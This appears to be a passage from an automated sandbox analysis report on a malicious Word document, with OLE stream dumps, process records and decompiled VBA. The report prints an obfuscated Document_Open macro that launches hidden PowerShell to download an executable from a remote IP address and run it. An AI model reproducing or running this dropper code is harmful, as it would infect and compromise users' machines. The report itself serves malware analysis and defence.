    Data Raw:6e fe 05 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 2e 78 22 11 03 11 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 26 00 00 00 04 41 01 00 00 00 05 c1 0e 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 30 00 31 00
    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410
    General
    Stream Path:Macros/PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:410
    Entropy:5.35778177907
    Base64 Encoded:True
    Data ASCII:I D = " { 5 D 6 5 F 4 3 D - 2 7 0 A - 4 8 3 B - 8 F A 4 - C B 6 D D 3 F 5 B D 6 D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 B 2 9 0 B 6 A 2 A 6 E 2 A 6 E 2 A 6 E 2 A 6 E " . . D P B = " 4 E 4 C 6 E 4 F B 2 5 1 D 4 5 2 D 4 5 2 D 4 " . . G C = " 7 1 7 3 5 1 9 2 5 2 9 2 5 2 6 D " . . . . [ H o s t
    Data Raw:49 44 3d 22 7b 35 44 36 35 46 34 33 44 2d 32 37 30 41 2d 34 38 33 42 2d 38 46 41 34 2d 43 42 36 44 44 33 46 35 42 44 36 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22
    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 65
    General
    Stream Path:Macros/PROJECTwm
    File Type:data
    Stream Size:65
    Entropy:3.27802992751
    Base64 Encoded:False
    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2592
    General
    Stream Path:Macros/VBA/_VBA_PROJECT
    File Type:data
    Stream Size:2592
    Entropy:4.11036825962
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
    Data Raw:cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 562
    General
    Stream Path:Macros/VBA/dir
    File Type:data
    Stream Size:562
    Entropy:6.329417886
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . Y . . b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . X . m . .
    Data Raw:01 2e b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 59 e9 b6 62 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
    Stream Path: WordDocument, File Type: data, Stream Size: 4096
    General
    Stream Path:WordDocument
    File Type:data
    Stream Size:4096
    Entropy:1.04528425699
    Base64 Encoded:False
    Data ASCII:. . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j [ . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . \\ 9 . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:ec a5 c1 00 59 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 39 a3 0a 5c 39 a3 0a 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:07:35:29
    Start date:11/06/2021
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
    Imagebase:0x13f380000
    File size:1424032 bytes
    MD5 hash:95C38D04597050285A18F66039EDB456
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:07:35:30
    Start date:11/06/2021
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
    Imagebase:0x13f610000
    File size:473600 bytes
    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:high

    Disassembly

    Code Analysis

    Call Graph

    Graph

    • Entrypoint
    • Decryption Function
    • Executed
    • Not Executed
    • Show Help
    callgraph 2 physicaldark 12 Document_Open Run:1,Chr:8

    Module: Module1

    Declaration
    LineContent
    1

    Attribute VB_Name = "Module1"

    Non-Executed Functions
    LineInstructionMeta Information
    2

    Sub physicaldark()

    7

    End Sub

    Module: ThisDocument

    Declaration
    LineContent
    1

    Attribute VB_Name = "ThisDocument"

    2

    Attribute VB_Base = "1Normal.ThisDocument"

    3

    Attribute VB_GlobalNameSpace = False

    4

    Attribute VB_Creatable = False

    5

    Attribute VB_PredeclaredId = True

    6

    Attribute VB_Exposed = True

    7

    Attribute VB_TemplateDerived = True

    8

    Attribute VB_Customizable = True

    Executed Functions
    APIsMeta Information

    Run

    IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe") -> 0

    Chr

    StringsDecrypted Strings
    "powers"
    "hell"
    "wscript.s"
    LineInstructionMeta Information
    9

    Private Sub Document_Open()

    10

    insidewith = "powers"

    executed
    11

    calllife = "hell"

    12

    rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))

    IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe") -> 0

    Chr

    executed
    13

    End Sub

    Reset < >